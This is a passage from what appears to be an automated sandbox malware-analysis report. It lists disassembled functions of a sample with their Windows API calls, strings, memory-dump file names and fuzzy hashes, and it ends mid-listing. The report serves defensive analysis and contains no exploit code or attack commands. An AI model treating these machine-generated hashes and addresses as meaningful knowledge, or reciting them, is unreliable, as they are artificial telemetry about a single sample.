_malloc.LIBCMT ref: 0043E50A
_wcschr.LIBCMT ref: 0043E564

Strings

0, xrefs: 0043E41D
Out of memory., xrefs: 0043E51E

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: KeyboardLayout_wcschr$AlphaChar_free_malloc
String ID: 0$Out of memory.
API String ID: 2524737710-1027521833
Opcode ID: fa91d30dbe4163ebb25d911acc3562ae4ba543cd787d60cb83254f83968d010a
Instruction ID: 6833922acdf2a6135e39435e3c23d6cab28ec57b81003e412c993bdd1d61b60b
Opcode Fuzzy Hash: fa91d30dbe4163ebb25d911acc3562ae4ba543cd787d60cb83254f83968d010a
Instruction Fuzzy Hash: A6B1D57150A34196DB25DF2A84417AB7BE0AF99314F08186FF884873D2E76CC94DC7AB

Uniqueness

Uniqueness Score: -1.00%

Function 0045B230, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 130networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0045B27E

Strings

0.0.0.0, xrefs: 0045B2E7
`, xrefs: 0045B36D

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Startup
String ID: 0.0.0.0$`
API String ID: 724789610-3371983081
Opcode ID: 3440a748c0ef1b9fbeb647d4c7cd687ecc0b1011b8dc23efaeadb4ae3cbfbbe1
Instruction ID: bca4fad09e4d05a53a71bf4d8e7308c5fcb7180316b2f8052143da3614fc7c60
Opcode Fuzzy Hash: 3440a748c0ef1b9fbeb647d4c7cd687ecc0b1011b8dc23efaeadb4ae3cbfbbe1
Instruction Fuzzy Hash: 0641AC716047059FC720DF18C8457ABB7A8FF85711F044A6AEC598B381EB78E808CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00457340, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 224windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(03055500,00001032,00000000,00000000), ref: 0045741F
__wcsnicmp.LIBCMT ref: 0045743A
SendMessageW.USER32(03055500,00001004,00000000,00000000), ref: 00457471

Strings

Col, xrefs: 00457434
$%K, xrefs: 0045739A

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: MessageSend$__wcsnicmp
String ID: $%K$Col
API String ID: 2103314646-623996615
Opcode ID: 3c1a0149e475937235dea2334087f983fd0489e85ddd6b290dbe0a30b4865a0f
Instruction ID: 4a47ab7fd94302390491453de3848d1bb4fecd98d3e543bd21ffa1e61870ca2d
Opcode Fuzzy Hash: 3c1a0149e475937235dea2334087f983fd0489e85ddd6b290dbe0a30b4865a0f
Instruction Fuzzy Hash: 6A61F0716043059BD720CF29E881B2AB7E5EB85726F50457FED4887392E738DC09C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0049C335, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,004CE940,00000008,0049C43D,00000000,00000000,?,0049D9F0,?,0047E61E,004011D4,00000000), ref: 0049C346
__lock.LIBCMT ref: 0049C37A

Part of subcall function 0049D0F2: __mtinitlocknum.LIBCMT ref: 0049D108
Part of subcall function 0049D0F2: __amsg_exit.LIBCMT ref: 0049D114
Part of subcall function 0049D0F2: EnterCriticalSection.KERNEL32(004011D4,004011D4,?,0049C37F,0000000D,?,0049D9F0,?,0047E61E,004011D4,00000000), ref: 0049D11C

InterlockedIncrement.KERNEL32(FF850B74), ref: 0049C387
__lock.LIBCMT ref: 0049C39B
___addlocaleref.LIBCMT ref: 0049C3B9

Strings

KERNEL32.DLL, xrefs: 0049C341
"M, xrefs: 0049C371
p)M, xrefs: 0049C3AE

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL$p)M$"M
API String ID: 637971194-2167561450
Opcode ID: 1ab2533366429e6c3ac0e31968dfe05846f8e4410aa4be47f55ab9acc2de6fb3
Instruction ID: 6b50f7868c4684eb7af2efc041658813a0a4bf98399d48e3e2394eefa604586f
Opcode Fuzzy Hash: 1ab2533366429e6c3ac0e31968dfe05846f8e4410aa4be47f55ab9acc2de6fb3
Instruction Fuzzy Hash: A501A571841700EFDB20AF6AD945749FFE0AF10328F10C95FE499967A1CBB8A540CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0041C090, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0041C0A0
__wcsicoll.LIBCMT ref: 0041C0B8

Strings

Label, xrefs: 0041C0E2
Lock, xrefs: 0041C0B2
Unlock, xrefs: 0041C0CA
Eject, xrefs: 0041C09A

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: Eject$Label$Lock$Unlock
API String ID: 3832890014-1359929989
Opcode ID: 381514835092df9cf65715d229ce29d156dccddb897ce53b4d6132672c251237
Instruction ID: 4359f878fff97ede7fa873191faa037e358f8519bba94335c936f7f8f888e462
Opcode Fuzzy Hash: 381514835092df9cf65715d229ce29d156dccddb897ce53b4d6132672c251237
Instruction Fuzzy Hash: 87F06C61AC151162DD11217D9C03BDB38545BD3B16F95457BFC44D13C2FB8DD9C880AD

Uniqueness

Uniqueness Score: -1.00%

Function 00473290, Relevance: 13.6, APIs: 9, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000019F,00000000,00000000), ref: 004732CA
SendMessageW.USER32(?,00000198,00000000,80000000), ref: 004732E3
SendMessageW.USER32(00000000,0000100C,000000FF,00000001), ref: 004732F9
SendMessageW.USER32(?,0000100E,00000000,80000000), ref: 00473316
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 0047332C
SendMessageW.USER32(?,00001104,00000001,80000000), ref: 00473345
SendMessageW.USER32(?,00000419,00000000,80000000), ref: 00473358
GetWindowRect.USER32 ref: 00473370
MapWindowPoints.USER32 ref: 00473384

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: MessageSend$Window$PointsRect
String ID:
API String ID: 467674420-0
Opcode ID: fda71255e3e76f6a8414c8a3533fff0b38f7bcb10b831a038c413cae1eee6ccb
Instruction ID: 019ef99572e9fd39e32423255823f63ee2430ce0adab40917319318cc60e3ab1
Opcode Fuzzy Hash: fda71255e3e76f6a8414c8a3533fff0b38f7bcb10b831a038c413cae1eee6ccb
Instruction Fuzzy Hash: 5331D674144305BFD320CF24CC85FAAB7A8EF98711F208A1DF698972D0DBB4E9458B95

Uniqueness

Uniqueness Score: -1.00%

Function 00459330, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 273COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00459439
__fassign.LIBCMT ref: 0045947C
__wcsnicmp.LIBCMT ref: 004594A1
__fassign.LIBCMT ref: 004594C0
__wcsnicmp.LIBCMT ref: 004594E5

Strings

Icon, xrefs: 0045949B
GDI+, xrefs: 004594DF

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __fassign$__wcsnicmp
String ID: GDI+$Icon
API String ID: 1066767119-2641797909
Opcode ID: c1ed47ea04e3d5257ba31a9090a96d607a0e1df866027c526ed51545e19b16c2
Instruction ID: 028e0e9cf0de97b6fe956ac9e8696f76bfb26ad215ca9dcdfdea62f67d6c5c4b
Opcode Fuzzy Hash: c1ed47ea04e3d5257ba31a9090a96d607a0e1df866027c526ed51545e19b16c2
Instruction Fuzzy Hash: 6B91D371504201DACB209F15888177B73E19F56716F14486FFC8A9B382E77CED4AC7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0043F270, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 0044D1B0: GetForegroundWindow.USER32(?,?,0043FD55,?), ref: 0044D1DE
Part of subcall function 0044D1B0: IsWindowVisible.USER32(00000000), ref: 0044D1F9

GetWindowRect.USER32 ref: 0043F29D
__wcsicoll.LIBCMT ref: 0043F2B7

Part of subcall function 00413C70: __fassign.LIBCMT ref: 00413C80

__wcsicoll.LIBCMT ref: 0043F2E3
__wcsicoll.LIBCMT ref: 0043F30E
__wcsicoll.LIBCMT ref: 0043F339
MoveWindow.USER32(00000000,?,?,?,?,00000001), ref: 0043F35B

Strings

default, xrefs: 0043F2B1, 0043F2DD, 0043F308, 0043F333

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Window__wcsicoll$ForegroundMoveRectVisible__fassign
String ID: default
API String ID: 313487032-3814588639
Opcode ID: d731e13f6423655a8062c53f269ebf2e1a8c4ed3b7ea2332bc91828524720ba1
Instruction ID: 03bf4306485a6272f14a2a2bfb9ececbf8d91662c28511129ea35bdd1a992023
Opcode Fuzzy Hash: d731e13f6423655a8062c53f269ebf2e1a8c4ed3b7ea2332bc91828524720ba1
Instruction Fuzzy Hash: DF31D832904301ABC710AB69CC4196B77E8AF89305F15153FFC0597282EB6DED4887AA

Uniqueness

Uniqueness Score: -1.00%

Function 0047E0E0, Relevance: 10.7, APIs: 7, Instructions: 174timeCOMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0047E109
_wcsncpy.LIBCMT ref: 0047E135
_wcsncpy.LIBCMT ref: 0047E16D
_wcsncpy.LIBCMT ref: 0047E1A1
_wcsncpy.LIBCMT ref: 0047E1D6
_wcsncpy.LIBCMT ref: 0047E20B
SystemTimeToFileTime.KERNEL32(?,?), ref: 0047E2B2

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _wcsncpy$Time$FileSystem
String ID:
API String ID: 456616543-0
Opcode ID: 4d8c8aef066391268d8faaf4736d77896b2b0fab6db539403296c7fad4393f75
Instruction ID: eeb6043eff36f26e66cbe33a47c08084e10b1550d717d74b535f6e5257448309
Opcode Fuzzy Hash: 4d8c8aef066391268d8faaf4736d77896b2b0fab6db539403296c7fad4393f75
Instruction Fuzzy Hash: 5F51187151430066D714DB2ACC42AABB3E5EFC8304F45CE6EF45AC7251F779E509835A

Uniqueness

Uniqueness Score: -1.00%

Function 00417030, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(004D6614), ref: 004170C8
GetSystemMetrics.USER32 ref: 00417140
GetSystemMetrics.USER32 ref: 00417146
GetCursorPos.USER32(?), ref: 004171A5

Strings

d, xrefs: 00417189

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: CursorMetricsSystem
String ID: d
API String ID: 3091566494-2564639436
Opcode ID: 92a704c4ed92267ed0bf1255e6b3ff339f58bf3d69280c7edb186ea560bc042c
Instruction ID: 6e2fbb60c436b99ce5d8ac5ea1f7da3587ff14c6c775432766a44ef274fa070a
Opcode Fuzzy Hash: 92a704c4ed92267ed0bf1255e6b3ff339f58bf3d69280c7edb186ea560bc042c
Instruction Fuzzy Hash: C051AC757093019BD728CF69D881BAA73E1BB88314F24493EE88587341E739E985CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004A9222, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PMDtoOffset.LIBCMT ref: 004A92F6
std::bad_exception::bad_exception.LIBCMT ref: 004A9320
__CxxThrowException@8.LIBCMT ref: 004A932E

Strings

Bad dynamic_cast!, xrefs: 004A9318

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Exception@8OffsetThrowstd::bad_exception::bad_exception
String ID: Bad dynamic_cast!
API String ID: 1176828985-2956939130
Opcode ID: 1bfdaace502a08d66eab87151262d2a97466586f6abdd456e4940c6bc0eca572
Instruction ID: c31cb9ddc9f0b44083bc5458835546f7a6548c3e0784ae4054bdbe7062bee7ed
Opcode Fuzzy Hash: 1bfdaace502a08d66eab87151262d2a97466586f6abdd456e4940c6bc0eca572
Instruction Fuzzy Hash: CB318376A00215AFCF14DF69C881B9E7BA1AF6A311F14489EF801E7391D73CED018B99

Uniqueness

Uniqueness Score: -1.00%

Function 00472090, Relevance: 10.6, APIs: 7, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004720AC
SendMessageW.USER32(?,0000102F,00000000,00000000), ref: 004720C0
SendMessageW.USER32(?,00001024,00000000,?), ref: 004720EF
GetSysColor.USER32(00000005), ref: 00472103
SendMessageW.USER32(?,00001026,00000000,?), ref: 00472116
SendMessageW.USER32(?,00001001,00000000,?), ref: 00472123
InvalidateRect.USER32(00000000,00000000,00000001,?,0000000B,00000000,00000000,?,00000192,?,?), ref: 0047212C

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: MessageSend$ColorInvalidateRect
String ID:
API String ID: 2722326260-0
Opcode ID: 1b454cb231db3d69864d0b401adbbc19e5497bec4d83a95bc7f41a7622869ef3
Instruction ID: c588501d74ed5d9488a3d54a0f114723ef271a1fc2129ea1867e22b13a78c221
Opcode Fuzzy Hash: 1b454cb231db3d69864d0b401adbbc19e5497bec4d83a95bc7f41a7622869ef3
Instruction Fuzzy Hash: 9D1133706403416BD6349B688DC5FE7B7A9FF0C710F20455ABA99A73C0D7F4A881CA68

Uniqueness

Uniqueness Score: -1.00%

Function 00461200, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 60COMMON

Download Yara Rule

Strings

ComObj, xrefs: 00461295
ComObject, xrefs: 0046128E
ComObjArray, xrefs: 0046120F
ComObjRef, xrefs: 0046121E

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID:
String ID: ComObj$ComObjArray$ComObjRef$ComObject
API String ID: 0-4247866589
Opcode ID: 7fae2ef2d1294c5d70da1b18098d309e3b372570109eb7a5b9c02fd0872fddc1
Instruction ID: 3225e0c1d3a42141bf05b451dfae89d77fc5527069b11ee2a3dc14e412754ea8
Opcode Fuzzy Hash: 7fae2ef2d1294c5d70da1b18098d309e3b372570109eb7a5b9c02fd0872fddc1
Instruction Fuzzy Hash: A201A1213003015BEB64DA9EA865B672398DB85711F28496FF515EA2E0EB68DC44C3AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040F020, Relevance: 9.4, APIs: 6, Instructions: 370COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F041
UnregisterHotKey.USER32(?,?,004D6340,00000028,004D8728), ref: 0040F0DB

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Unregister_memset
String ID:
API String ID: 2392160147-0
Opcode ID: 26bd3f5713dfceb7f4d4a2f22dec4b19a05b1ca8df11c797b9da683ab4e61799
Instruction ID: 903cfdac1d403b69279b55aed4a13c4832cd2a4b541d392805e49fb33cb42ae9
Opcode Fuzzy Hash: 26bd3f5713dfceb7f4d4a2f22dec4b19a05b1ca8df11c797b9da683ab4e61799
Instruction Fuzzy Hash: B9E1EF305096818AEB35CB24C444763BBA1AB52318F1845BFC8816BFD2D37DED8ED799

Uniqueness

Uniqueness Score: -1.00%

Function 00461320, Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

SafeArrayGetDim.OLEAUT32(?), ref: 0046132D
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0046134B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00461365
SafeArrayAccessData.OLEAUT32(?,?), ref: 0046137D
SafeArrayGetElemsize.OLEAUT32(?), ref: 004613A1

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: ArraySafe$Bound$AccessDataElemsize
String ID:
API String ID: 505432365-0
Opcode ID: 6c2717461d44d571997e4a5240d205101ccff894a563d48755f72654eb7002ec
Instruction ID: 1fd3cfbf456d8ef87d7e5716a0dbfd9bcd44ffca229575c75385a3482372a71c
Opcode Fuzzy Hash: 6c2717461d44d571997e4a5240d205101ccff894a563d48755f72654eb7002ec
Instruction Fuzzy Hash: 923191B55043129FD700DF29D88496ABBE8EF88310F04886EFD4597331EB79E8448B66

Uniqueness

Uniqueness Score: -1.00%

Function 004112E0, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 00411348
GetKeyboardLayout.USER32(00000000), ref: 00411363

Part of subcall function 0047E600: _vswprintf_s.LIBCMT ref: 0047E619

Strings

"%s" is not allowed as a prefix key., xrefs: 004113CE
"%s" is not a valid key name., xrefs: 004114F8

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: KeyboardLayout__wcsicoll_vswprintf_s
String ID: "%s" is not a valid key name.$"%s" is not allowed as a prefix key.
API String ID: 2348117768-1430096861
Opcode ID: 69a9709e0ba080262049983b2d8f105aad085200b1aea1d78cf3a27b487b81f7
Instruction ID: c0106921f37f6c22e054f219a7392fc293dafbcda534223409c7f0114e9fa81f
Opcode Fuzzy Hash: 69a9709e0ba080262049983b2d8f105aad085200b1aea1d78cf3a27b487b81f7
Instruction Fuzzy Hash: C3717A326483845AE730DB19A8827FB7781DB91710F48042FFF45863D1E6AD898DC3AE

Uniqueness

Uniqueness Score: -1.00%

Function 00447040, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 185COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00447110

Strings

Out of memory., xrefs: 0044717A
$%K, xrefs: 00447225
1aA, xrefs: 0044708F
UseErrorLevel, xrefs: 00447073

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _free
String ID: $%K$1aA$Out of memory.$UseErrorLevel
API String ID: 269201875-1373778889
Opcode ID: 9a9c497c0b34c6b293ac8aff6e035b0d659fccfba16e11774473c1aa79bb89ec
Instruction ID: b4bd2d323930e6cbeb64e2b4431fc642d71c99cf0c6de0742b420be8745bf76b
Opcode Fuzzy Hash: 9a9c497c0b34c6b293ac8aff6e035b0d659fccfba16e11774473c1aa79bb89ec
Instruction Fuzzy Hash: 425103712087005BE720DF29C881B67B7E5AB95350F00496FF59187382D779EC07CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00442290, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

__ultow.LIBCMT ref: 004422BD

Part of subcall function 00497E1F: _xtow@16.LIBCMT ref: 00497E2F

GetClassNameW.USER32 ref: 004422F2
__wcsicoll.LIBCMT ref: 00442318
__itow.LIBCMT ref: 004423C9

Strings

0, xrefs: 004422B5

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
